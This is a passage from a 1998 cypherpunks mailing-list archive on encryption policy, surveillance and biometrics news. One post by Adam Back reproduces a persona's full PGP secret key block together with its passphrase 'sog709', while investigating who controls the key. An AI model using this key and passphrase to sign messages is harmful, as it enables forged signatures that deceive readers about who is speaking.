To: rah@shipwright.com
Subject: Questions for Magaziner? // taxing crypto
Message-ID: <199809192221.SAA13345@swan>
MIME-Version: 1.0
Content-Type: text/plain




Hi Bob --

I feel mis-quoted and/or mis-represented in your note (below)
stating that "Magaziner mirrored Rivest's offer to tax encryption
products to pay for increased law enforcement technology support".
While I do feel that some measure of appropriate balance may be
accomplished by increasing the budget of the FBI and other
law-enforcement to help them compensate for whatever increased
difficulties they encounter because of the widespread use of
encryption, I do not recall ever suggesting that the revenues for such
increased budgets be raised by specifically taxing encryption
products, and I don't really think that is a sensible approach.  We don't
tax glove manufacturers to raise funds for the FBI fingerprint lab!
Any such funding should come out of general revenues, not by further
complicating the tax code.

	     Cheers,
	     Ron


------- Start of forwarded message ------- Return-Path:
<cryptography-owner@c2.net> X-Sender: rah@pop.sneaker.net In-Reply-To:
<v03130304b227b7401a3a@[24.128.118.53]> Date: Fri, 18 Sep 1998
16:44:07 -0400 To: "Arnold G. Reinhold" <reinhold@world.std.com>,
cypherpunks@cyberpass.net, cryptography@c2.net, dcsb@ai.mit.edu From:
Robert Hettinga <rah@shipwright.com> Subject: Re: Questions for
Magaziner?  Sender: owner-cryptography@c2.net

Okay, so the short precis on Magaziner's answer to my question about
encryption controls, foriegn or domestic, is he's agin it.

He says that controlling foriegn encryption is impossible, and controlling
domestic encryption is, at the very least, unconstitutional.

He says that the reason the administration's encryption policy is so
convoluted is that the law enforcement and the "economic" encryption camps,
anti, and pro, evidently, is that the two sides are at loggerheads.
Magaziner mirrored Rivest's offer to tax encryption products to pay for
increased law enforcement technology support, but, hey, he's a liberal
democrat, he's supposed to tax us to death without thinking about the
economic, and, of course privacy consequences of raising the price of
encryption.

So, all in all, he got a round of foot-stomping applause from this bunch on
his pro-encryption stance, because, evidently, being a payments technology
forum, he was preaching to the choir. Something I found out when I was
doing my own speech yesterday. I should realize that anyone building a
payment system knows that digital commerce is financial cryptography, after
all. :-)

Cheers,
Bob Hettinga
- -----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
------- End of forwarded message -------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 19 Sep 1998 18:19:35 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Clinton's fake apologies (fwd)
Message-ID: <199809192343.SAA10957@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From adam@rpini.com Sat Sep 19 16:40:18 1998
> Date: 19 Sep 1998 21:21:26 -0000
> Message-ID: <19980919212126.20210.qmail@hades.rpini.com>
> From: Anonymous <nobody@remailer.ch>
> Subject: Re: Clinton's fake apologies (fwd)

> > Then don't take the oath:
> > 
> > To tell the truth, the whole truth, and nothing but the truth.

> What? To tell a lie is one thing, but if you preface it with "I'm telling the truth",
> then that is really really bad? I still think you're drawing a very fine line.

Of course it's different if you preface your lie with "I swear to tell the
truth, the whole truth, and nothing but the truth".

The oath is voluntary and therefore if broken no claim for duress, only
intentional misdirection, can explain such actions.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 19 Sep 1998 12:26:05 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199809191728.TAA24903@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

September 19, 1998, U.S. Medical Center for Federal
Prisoners, Springfield, Missouri, not a Magic Circle.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNgPkchp0s99tXiQlAQEoHQP+IX2GivNiJpIB3ryiu+bte0+YyJRTZDWB
bbF/qRIGrOOVKpNxuu+riAz0oUxHW3xuooPmIVcR8O0tfXljrxyAvK4qdtPFWyr9
+PaE5clU7XdRqxiKGfao569W1vRPJW5vlmUm+/BHmRF1ADG/HqTy/EbivKEvZGcw
UmrV65r+9ho=
=wa8X
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 19 Sep 1998 13:58:27 +0800
To: cypherpunks@cyberpass.net
Subject: TruthMonger key's password!
In-Reply-To: <199809191728.TAA24903@replay.com>
Message-ID: <199809191846.TAA24067@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Anonymous writes on cpunks (blank subject field from nobody@replay.com
earlier today).

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> September 19, 1998, U.S. Medical Center for Federal
> Prisoners, Springfield, Missouri, not a Magic Circle.
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBNgPkchp0s99tXiQlAQEoHQP+IX2GivNiJpIB3ryiu+bte0+YyJRTZDWB
> bbF/qRIGrOOVKpNxuu+riAz0oUxHW3xuooPmIVcR8O0tfXljrxyAvK4qdtPFWyr9
> +PaE5clU7XdRqxiKGfao569W1vRPJW5vlmUm+/BHmRF1ADG/HqTy/EbivKEvZGcw
> UmrV65r+9ho=
> =wa8X
> -----END PGP SIGNATURE-----

That one I can verify the signature of (unlike the 0x2541C535 key-id
signed post which I proposed we try a signature attack on because of
lack of public key), because I have on my keyring the secret key since
adding the secret key to my key ring from this post which was made to
cypherpunks [1] with headers below (look in the archives, or copied
below):

: From: nobody@REPLAY.COM (Anonymous)
: To: cypherpunks@toad.com
: Date: Tue, 23 Sep 1997 01:58:52 +0200 (MET DST)
: Subject: Persistent Persona

The key in that message was:

Type Bits/KeyID    Date       User ID
sec  1024/6D5E2425 2041/12/07 TruthMonger

-----BEGIN PGP SECRET KEY BLOCK-----
Version: 2.6.3i

lQHgA4dN5oIAAAEEAM/3b3wHc1iQEmtk9NQhmrHmZmlCdZH4T3kf2APlwA/NRsfU
pAa++0pBdgMMOr9QBMWNWuRuZriEUE/jH9cdMkgBeOrvsviFSe2wN074LrCZSugO
6KabPwokodYl8+R8xY5NC1pZUD4sYf49L6xOwpjiXukrRKqwABp0s99tXiQlAAUR
ARwSOk76t7D7A/0n7XVeJ5qLKatxrzKZ1+U9PLhEeeQkknETkj9aFmRNrj/I4n/Y
TgxKh74zK1/kM4y6bunTNU6+pBDPrvYJgqoq4kMlS3jXNdGBFn0Tw0j2klSZpXzA
Tb593tKD66dztQXiYbYYhydQixUp22NwjruiIfwjFdtU7tOhKfLgZ+dGJQIAH40N
9Gpt3oSQ+ua6I1mOEYzWXdH8HdaNQKxGVRYVH71Wi2TpDLuZbbYq6RB9LDQ0VJO0
6DumKr1OSG32zda+kwIAvjPYd8xEOyCo2NJfL2ZUBh9/GC9nb9UTxdwFP7AFx0F7
DTA+prGb672ly3NAa7/gje2W4isd3NN+T6T13WHmcAH+MnnMDMclF/hNKrhR39aB
1ZvVEBh8yz8xWCm5BQOqp55KyJGgDY0kAcwqejE0PHV8dMG6TVteVvOu7D7GDFcB
4KXvtAtUcnV0aE1vbmdlcg==
=HBLx
-----END PGP SECRET KEY BLOCK-----

which means that anyone can create such signatures.

That PGP correctly copes with signatures made by keys it has only a
private key for (and no public key) is something of a surprise -- PGP
must be smart enough to use the private key if the public key isn't
around on the keyring.  (The public key is a subset of private key).

Erk! just tried to create a signed file with that private key, and I
didn't notice before when I commented on the posting of this key that
key has a passphrase!  It wouldn't be one of those John Young
forwarded to the list from an anonymous source would it....

Holy smoke!  Now we are getting somewhere, the person who remailed
those passphrases to John Young knew that keys passphrase, and yet the
key was posted back in Sep 97!

John Young writes on cpunks:
> This allegedly is forwarded from CJ, though from an unknown source 
> so think twice:
> 
>       "Passwords:  sog, sog709, sog709cejCJP,sog709cjpCEJ, D'Shauneaux, 
>       D'shauneaux, and others..."

The passphrase was sog709.  Try it and see.  Check in the archives for
yourself for that message, (subject 'Persistent Persona') and become
paranoid!

What is going on here?  Is Toto still at large, drunk behind the
keyboard?  Is Toto not one person?  Or have the IRS extracted Carl
Johnson's passphrases from him and got busy playing mind-games with
us?

Adam

[1]
======================================================================
Date: Tue, 23 Sep 1997 01:58:52 +0200 (MET DST)
Subject: Persistent Persona
To: cypherpunks@toad.com
From: nobody@REPLAY.COM (Anonymous)

-----BEGIN PGP MESSAGE-----
Version: 2.6.2

lQHgA4dN5oIAAAEEAM/3b3wHc1iQEmtk9NQhmrHmZmlCdZH4T3kf2APlwA/NRsfU
pAa++0pBdgMMOr9QBMWNWuRuZriEUE/jH9cdMkgBeOrvsviFSe2wN074LrCZSugO
6KabPwokodYl8+R8xY5NC1pZUD4sYf49L6xOwpjiXukrRKqwABp0s99tXiQlAAUR
ARwSOk76t7D7A/0n7XVeJ5qLKatxrzKZ1+U9PLhEeeQkknETkj9aFmRNrj/I4n/Y
TgxKh74zK1/kM4y6bunTNU6+pBDPrvYJgqoq4kMlS3jXNdGBFn0Tw0j2klSZpXzA
Tb593tKD66dztQXiYbYYhydQixUp22NwjruiIfwjFdtU7tOhKfLgZ+dGJQIAH40N
9Gpt3oSQ+ua6I1mOEYzWXdH8HdaNQKxGVRYVH71Wi2TpDLuZbbYq6RB9LDQ0VJO0
6DumKr1OSG32zda+kwIAvjPYd8xEOyCo2NJfL2ZUBh9/GC9nb9UTxdwFP7AFx0F7
DTA+prGb672ly3NAa7/gje2W4isd3NN+T6T13WHmcAH+MnnMDMclF/hNKrhR39aB
1ZvVEBh8yz8xWCm5BQOqp55KyJGgDY0kAcwqejE0PHV8dMG6TVteVvOu7D7GDFcB
4KXvtAtUcnV0aE1vbmdlcg==
=HBLx
-----END PGP MESSAGE-----

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzOCm1EAAAEIANB5WCFbEjUhNaZ2cEWuh9xcP48QBixzJpxPqGc0Sogj9W1L
ezM5GDF0tZp5ksNbWf5+ErNxXo0yOM7LjDl+sRrEmcbuTkjqPJxG/q4JZ7Al3/FF
h1SFGWpQNz9BPewgHS8/Lp9Ywl+ELeau+FPrr/xmktYifBBaaPUTS5oNMhn4Ih0r
yez6WFn6lRYz+FLsXchjkg+I22tC1aD6iKv/BxCM//GzJ8UNkE7Vx94jZxJ/0vqE
3msqN1coj99okoggWzR5xe/wcLjUjXBw4Z208zhKNEC1AemkJV5HSbztfOgpZOqX
4dwsSDREfFcerM3gusIv3Gz+oU5WPTNSVeg5/HkABRG0GVRydXRoTW9uZ2VyIDx0
bUBkZXYubnVsbD6JARUDBRAzgptRPTNSVeg5/HkBAXUeB/4y3/VlUzua8TVbAiTW
KPXvqTq28XHrhNrTiDWXX7KaFmRyZC20OLbRNtJH1XJUeZv7yhxXkIO2jW6e1i95
MWcx0JAheNjdqKAdNFUVaqs6R2+ySAU7PtfbfVx/RUxsTW8jLfppI7ajTf3E9z3u
nO6NpN/z74DO659tiwfNjT8YoRH3EEomSKNZ3yIGhbyTHv+FOrJs8sQ3jhqmFb37
nr0er1+BWi9Sr2LS7aK+iCK/ZKhUqaofkoo6S/M6nTWKU7RiDhvK0wm40Lassb83
z3NjwN2NNZDwCPYM3d12LjxWA70qljx/qsSRptvkDmnLKXnEUvTsnf9dErhpYLtg
yGBFiQCVAwUQM4LW/7BfjJBm+4xlAQEbJAP/RsKZ/khOS+4nD7JfPnKMKMVjDOif
x0enjzf7kW//GnMsi70yaYi6QeoT0YUYVNQ+wWwGUPgAejs2PLk1VIbn4GIvRU+1
Uj6xTTfHkIibUtvz7LtC/JmNafWSETDnJOlqszgzTnE0duDwZ83ISWdzHkhEXnfC
BxcPay75u1zC6FQ=
=j6da
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:46:08 +0800
To: cypherpunks@cyberpass.net
Subject: IP: IRS official predicts Y2K snafus
Message-ID: <199809200246.TAA11933@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: IRS official predicts Y2K snafus
Date: Fri, 18 Sep 1998 12:20:40 -0500
To: believer@telepath.com

Source:  Government Executive Magazine
http://www.govexec.com/dailyfed/0998/091798n1.htm

September 17, 1998

DAILY BRIEFING

IRS official predicts Y2K snafus

By Nancy Ferris
nferris@govexec.com

The new chief information officer at the IRS is predicting there
will be tax processing problems in the upcoming filing season
because of the agency's speeded-up program to fix year 2000
bugs in its computer systems.

CIO Paul J. Cosgrave, speaking today at a luncheon meeting
of the Association for Federal Information Resources
Management, said 98 percent of the IRS's software will be
fixed by early next year, when the 1998 filing season begins.
But, he added, "there will be some problems" because not all
of the fixes will be perfect.

Asked afterward how serious the problems would be,
Cosgrave said it was too early to tell. The agency is working
hard to minimize their effect, he added. The good news, he
said, is that when the century change actually occurs on Dec.
31, 1999, the IRS will have put its Y2K problems behind it.
"We're a year early," he said. The agency is spending close to
$1 billion on Y2K fixes.

Cosgrave, a well-known consultant, was brought in to help the
IRS straighten out its troubled systems modernization program
and build new systems to support the reorganized agency. He
said the IRS will exercise more central control over information
technology and try to standardize the systems environment.
"Today we have 17 e-mail systems in the IRS," he said by way
of example.

The reorganization announced by IRS Commissioner Charles
Rossotti will replace the service's current regional structure with
four new units serving specific groups of customers. That
change, combined with the systems modernization program,
will lead to new job responsibilities for many IRS employees,
Cosgrave said.

The agency will move some headquarters functions to field
offices and move some back office employees to customer
service jobs. But because it can't relocate many of the affected
workers, it plans to "use more remote assignment work,"
where employees in one location work for managers in
another, Cosgrave said.

The IRS also will dramatically increase its investment in
employee training, from $3.5 million this year to $11 million
two years from now.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:45:25 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Crypto Controls Threaten Human Rights
Message-ID: <199809200246.TAA11944@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Crypto Controls Threaten Human Rights
Date: Fri, 18 Sep 1998 17:06:43 -0500
To: believer@telepath.com

Source:  OneWorld Magazine
http://www.oneworld.org/news/today/index.html

Crypto Controls Threaten Human Rights 
 Vienna conference warned against restricting free expression 

 (New York, September 18, 1998) -- Human Rights Watch today urged an
international conference on technology, now meeting in Vienna, not to
expand controls on encryption technologies. The organization said that
cryptographic products are critical to the ability of human rights
defenders around the world to transmit sensitive information without
detection by repressive governments. 

The conference is reviewing the 1996 Wassenaar Arrangement, an
international agreement signed by 30 countries to govern the proliferation
of military technology. 

Dissidents and human rights organizations under repressive regimes
frequently use encryption technologies to share information. Encryption has
the power to authenticate the identity of these authors to their partners
abroad, while protecting their identity from despots at home.  

The United States has adopted relatively restrictive encryption policies,
which prohibit the global dsitribution of software used to encrypt text. In
particular, Washington has outlawed the export of the most popular software
among human rights activists, Pretty Good Privacy (PGP), although the
Wassenaar Arrangement explicitly exempts crypto-software, like PGP, that is
widely available in the public domain. 

Human Rights Watch warned the other participants in the Vienna conference
not to incorporate such restrictive policies into the Wassenaar
Arrangement, or to further limit the global distribution, development, or
use of strong encryption hardware or software. 

"Encryption is more than a shield for human rights activists," said Jagdish
Parikh, associate online researcher at Human Rights Watch. "Coded language
is still language, and it must be protected as a basic human right to free
expression." Parikh noted that the right to free expression is set forth in
Article 19 of the International Covenant on Civil and Political Rights, to
which most members of Wassenaar Arrangement are party. 

Human Rights Watch said that encryption is also an important bulwark
against violations of privacy in an age where computerization and data
banks enable the collection of huge amounts of personal information about
individuals. Moreover, international law requires states not only to
refrain from arbitrary interference with privacy, but to affirmatively
protect its citizens from such attacks.  

"The sorts of countries most eager to ban the use of encryption, such as
China and Iran, are not known for respecting freedom of speech," said
Parikh. "Using encryption should not subject an individual to criminal
sanction, any more than using Pig Latin or Swahili does." 

Many human rights activists around the world would be spared retaliation
and abuse if crypto-software were more widely available, Parikh said. 
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:44:44 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] Ohio gets Computerized Fingerprint System
Message-ID: <199809200246.TAA11955@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] Ohio gets Computerized Fingerprint System
Date: Fri, 18 Sep 1998 19:34:28 -0500
To: ignition-point@majordomo.pobox.com

======================================================================
SCAN THIS NEWS

-------------------------------------------------
http://www.ag.ohio.gov/pressrel/livescan.htm

FOR IMMEDIATE RELEASE
July 25, 1997

Attorney General Betty Montgomery Brings New Technology
to Ohio Law Enforcement

Montgomery Gives Computerized Fingerprint Systems
Free of Charge to Help in the Fight Against Crime

Columbus -- In an effort to assist local law enforcement and improve Ohio's
criminal history records, Attorney General Betty D. Montgomery today
announced that 23 law enforcement agencies in Ohio will be receiving
Live-Scan systems at no cost to the agencies.

Through federal grants and money from the Attorney General's budget,
Live-Scan computerized fingerprint identification systems have been
purchased and are being distributed to law enforcement agencies across the
state. The agencies that send the most fingerprint cards to the Ohio Bureau
of Criminal Identification and Investigation (BCI) were chosen to receive
Live-Scan.

Montgomery was joined by representatives from several law enforcement
agencies that will be receiving Live-Scan systems and local public officials
in announcing this new technology being given to more than 20 law
enforcement agencies.

"I want to thank the Attorney General's Office for this modernized
equipment, which will help law enforcement's advancement in building the
bridge to the 21st century, with technology in crime fighting," said
Franklin County Sheriff Jim Karnes.

Live-Scan provides high-quality electronic fingerprint images through
state-of-the-art computer imaging. Most Ohio law enforcement agencies rely
on the traditional form of using ink to slowly roll each individual
fingerprint onto cards.

With Live-Scan, fingers are placed directly onto a scanner without having to
use ink. The image is stored electronically, and copies of the card can be
printed at any time. This new system will give law enforcement consistently
higher quality fingerprints to use for processing and identification.

These new systems will also electronically send the fingerprint cards to
BCI. This will be an important step in ensuring the quality of Ohio's
criminal history records. BCI will now be able to receive records in a more
timely fashion and virtually eliminate the possibility of records being lost
or not sent. The systems will assist local law enforcement by cutting-down
on the number of hours needed to process fingerprint cards by eliminating
the timely duplicative process of fingerprinting.

The Live-Scan systems will be linked late this fall to BCI's Automated
Fingerprint Identification System (AFIS). AFIS is a computer system that
holds the fingerprint images and criminal history records of more than 1.2
million criminals in Ohio. With Live-Scan, law enforcement agencies will be
able to quickly search AFIS for matches to their fingerprint cards. This
will be extremely useful if someone with a prior record tries to give an
alias or refuses to disclose his or her name. The agency can scan the
suspect's fingerprints and check them against the database at BCI for a
match.

"Here's the bottom line: This technology will allow police to identify
criminals faster and more accurately than anything even dreamed of just
years ago," Montgomery said.

The Live-Scan systems were purchased for almost $1.1 million from Identix
Inc. of California. Ohio is joining the Federal Bureau of Investigation, the
Bureau of Alcohol, Tobacco, and Firearms, the U.S. Marshal, and numerous
other federal agencies, states, and cities that have also purchased
Live-Scan systems from Identix Inc. Each system retails for $70,000 but the
Attorney General was able to negotiate a purchase price for a much lower
cost of $44,220.

Law enforcement agencies that already have Live-Scan systems and meet
requirements of the National Institute of Standards and Technology will be
connected with Ohio's AFIS as part of the contract with Identix Inc. The
contract also allows any local law enforcement agency to purchase a
Live-Scan system within the next year at the same price negotiated by the
Attorney General.

Attorney General Montgomery also announced that her office plans to purchase
additional Live-Scan systems in the beginning of next year to be distributed
to more law enforcement agencies across the state.

-30-

Below is the list of agencies receiving Live-Scan systems:

Cleveland Police Department
Cuyahoga County Sheriff's Office
Clermont County Sheriff's Office
Delaware County Sheriff's Office
Franklin County Sheriff's Office
Clark County Sheriff's Office
Pickaway County Sheriff's Office
Miami Township Police Department
Columbiana County Sheriff's Office
Lake County Sheriff's Office
Licking County Sheriff's Office
Mahoning County Sheriff's Office
Highland County Sheriff's Office
Boardman Police Department
Elyria Police Department
Allen County Sheriff's Office
Lorain Police Department
Coshocton County Sheriff's Office
Whitehall Police Department
Miamisburg Police Department
Springdale Police Department
Kent Police Department
Medina County Sheriff's Office

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================






**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:44:47 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [BioWeekly_Email] Announcement
Message-ID: <199809200246.TAA11966@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Bioweekly Special Announcement <bioweekly@biodigest.com>
Subject: IP: [BioWeekly_Email] Announcement
Date: Fri, 18 Sep 1998 18:17:12 -0500
To: ignition-point@majordomo.pobox.com

We thought you might be interested in some recent announcements
regarding Banking on Biometrics =9298 which is just around the corner. The
conference is on October 12-14, 1998 in Dallas, Texas, US.

New speakers recently added include:

     Randall Fowler, CEO, Identix Corp.;=20
     Frank Smead, SpeakerKey Marketing Manager, ITT Industries;=20

Other outstanding presenters include:=20

     Jim Wayman, US National Biometric Test Center
     John Woodward, Attorney and Biometric Legal Consultant
     Jeremy Newman, President, PenOp Corp.=20
     Adam Backenroth, Chase Manhattan Bank
     Dr. Joseph Atick, CEO, Visionics Corp.
     Colleen Madigan, SafLINK Corp.
     Gail Koehler, Purdue Empl. Fed. Credit Union
     James O=92Dell, CUNA Mutual Insurance Group
     Robert Van Naarden, Sensar, Inc.=20
     Michelle Roberts, Texas Bankers Association
     Ray Findley, Pres., American Card, Inc.=20
     Chris Olsen-Potter, Identicator, Inc.
     Raj Nanavati, International Biometric Group
     Judith Markowitz, J.Markowitz Consultants
     Ron Beyner, T-NETIX, Inc.=20
     Francis Declercq, Keyware Corp.
     Mike Grimes, Miros Corp.=20

=3D=3D>  GET YOUR FREE REGISTRATION THROUGH OUR GROUP DISCOUNT PROGRAM

Connect with Southwest Airlines to get your lowest possible airline
rates to Dallas =85.. but better yet, register two of your clients,
business associates, customers, prospects, friends or family and attend
the conference FREE.  You can register three persons for the price of
two - and that third person could be YOU. Conference registration is
$490. =20

Our group discount is excellent for any company wanting to send a group
of employees for an employee training program.  Registration fees drop
to $350 each for 4-5 persons, $300 each for 6-10 persons and to $260
each for over 10 registrants.


=3D=3D>  BIOMETRIC VIDEO TAKING SHAPE

The first biometric infomercial is taking shape and will be available
during and after the conference. If you register NOW, you=92ll get a free
copy at the conference.  If you want a copy later, we=92ll be glad to sell
you one. Suggested cost (still pending) is $125.


=3D=3D>  NEED MORE INFORMATION ON BIOMETRICS

There will be biometric consultants at the conference who will be glad
to answer your questions and provide you with more information.=20


=3D=3D>  VISIT THE CONFERENCE WEB SITE FOR MORE DETAILS AND RESERVATION
INFORMATION -=20

    http://www.biodigest.com

    or call Linda Bikoff - (202) 337-0023,  Email - Lbikoff@aol.com.








**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 21:57:58 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 4.47:Russian Big Brother covets all the E-mail
Message-ID: <199809200246.TAA11978@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 4.47:Russian Big Brother covets all the E-mail
Date: Sat, 19 Sep 1998 01:18:03 -0700
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 4.47:Russian Big Brother covets all the E-mail
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Saturday September 19, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: US News & World Report, September 14, 1998
http://www.usnews.com

Big Brother covets all the E-mail
http://www.usnews.com/usnews/issue/980914/14key.htm

By
Christian Caryl


Believe it or not, there are some areas where Russia leads the world. While
other countries from Germany to Singapore ponder the pluses and minuses of
government regulation of the Internet, Russia is way ahead. Its State
Security Service (FSB), the main successor to the KGB, is planning
all-encompassing surveillance of Internet communications. Internet
activists say that the proposed regulations are proof of just how far
Russia's struggling democracy has to go. "There is no concept of privacy
anywhere in Russian legislation," says Andrei Sebrant of GlasNet, one of
the country's leading Internet service providers. "So strictly speaking,
there's nothing at all illegal about this."

The plans, which have never been officially presented or acknowledged by
the government, became public a few weeks ago, when they were leaked to
critics. The idea is to force each service provider to install a "black
box" connecting its network to the local FSB office via fiber-optic cable.

That would enable state-sponsored snoopers to collect and examine E-mail,
as well as data on addressees and recipients and Web surfing habits. Users,
meanwhile, would never have the slightest sign of prying eyes and ears.

The cost for the extra equipment would be borne by the providers
themselves. Anatoli Levenchuk, an Internet expert who posted the proposed
regulations on the Web and is leading the most vocal online protest, says
that the requirements would boost providers' costs by 10 to 15 percent.
That increase would be passed on to users, who already pay around $35 per
month, very expensive by Russian standards. "Right now, we have about 1
million Internet users in Russia," says Levenchuk. "So those price hikes
could immediately reduce the Internet community here by hundreds of
thousands." Any providers who refuse to comply can expect to have their
operating licenses yanked by the all-powerful Ministry of Communications,
which has been helping the FSB draft the rules.

But the FSB's plans may ultimately serve to prove just how resistant to any
kind of centralized control the Internet remains. The new proposal doesn't
address encryption, and the drug dealers and terrorists the FSB ostensibly
wants to catch will be the first to resort to tough-to-crack encryption
systems. Russian Web sites offering encryption technology have been doing a
booming business since the first news of the regulations came out. But most
Russian Internet users have little familiarity with encryption techniques,
according to Maksim Otstavnov, an editor at CompuTerra magazine. For them,
this could be the electronic equivalent of the days when the Soviet KGB
routinely tapped phones and opened mail.

--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a daily bases
(approx. 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you value in the ISPI Clips service or if
you are concerned about the erosion of your privacy in general, won't
you please help us continue this important work by becoming an "ISPI
Clips Supporter" or by taking out an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Clips Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.








**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
